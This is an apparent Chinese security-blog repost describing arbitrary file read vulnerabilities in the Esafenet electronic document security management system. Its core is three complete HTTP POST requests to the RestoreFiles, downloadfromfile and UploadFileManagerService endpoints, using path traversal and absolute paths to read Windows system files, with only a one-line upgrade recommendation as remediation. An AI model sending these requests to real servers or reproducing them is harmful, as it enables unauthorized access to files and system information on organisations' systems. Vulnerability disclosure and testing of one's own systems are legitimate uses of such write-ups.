亿赛通电子文档安全管理系统-File Read

admin
admin
admin
135630
文章
111
评论
2024年5月16日12:36:56评论79 views字数 1778阅读5分55秒阅读模式

声明

亿赛通电子文档安全管理系统-File Read

使击,后果自负

亿赛通电子文档安全管理系统-File Read

亿赛通电子文档安全管理系统-File Read

亿赛通

亿赛通电子文档安全管理系统-File Read

漏洞描述

赛通电子文档安全管理系统是一款专门为机关、金融和企事业单位设计的软件,它可以帮助这些机构对电子文档进行安全管理,在其UploadFileManagerService、RestoreFiles、downloadfromfile接口存在任意文件读取漏洞,导致系统信息泄露。

亿赛通电子文档安全管理系统-File Read

漏洞详情

亿赛通电子文档安全管理系统-File Read

1、RestoreFiles

漏洞URL:/CDGServer3/document/RestoreFiles;login

漏洞参数:filePath

漏洞详情

POST /CDGServer3/document/RestoreFiles;login HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: application/x-www-form-urlencodedcommand=DownloadDoc&fileNameForDownload=&downPath=c:/windows/win.ini

亿赛通电子文档安全管理系统-File Read

2、downloadfromfile

漏洞URL:/CDGServer3/downloadfromfile

漏洞参数:fileName

漏洞详情:

POST /CDGServer3/downloadfromfile HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: application/x-www-form-urlencodedfileName=../../../../../../../../../../../windows/win.ini

亿赛通电子文档安全管理系统-File Read

3、downloadfromfile

漏洞URL:

/CDGServer3/document/UploadFileManagerService;login

漏洞参数:fileName

漏洞详情:

POST /CDGServer3/document/UploadFileManagerService;login HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1Content-Type: application/x-www-form-urlencodedContent-Length: 71command=ViewUploadFile&filePath=c:/windows/system.ini&fileName1=hello

亿赛通电子文档安全管理系统-File Read

end

亿赛通电子文档安全管理系统-File Read

修复建议

我升级应用到安全版本。

亿赛通电子文档安全管理系统-File Read

平安喜乐

亿赛通电子文档安全管理系统-File Read

日子,要的是知足;生活,要的是幸福;生命,要的是健康;做人,要的是骨气;做事,要的是尽心;人生,要的是无悔。珍惜身边的幸福;欣赏自己的拥有。。

亿赛通电子文档安全管理系统-File Read

亿赛通电子文档安全管理系统-File Read

END

原文始发于微信公众号(小羊安全屋):亿赛通电子文档安全管理系统-File Read

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月16日12:36:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   亿赛通电子文档安全管理系统-File Readhttps://cn-sec.com/archives/2746260.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息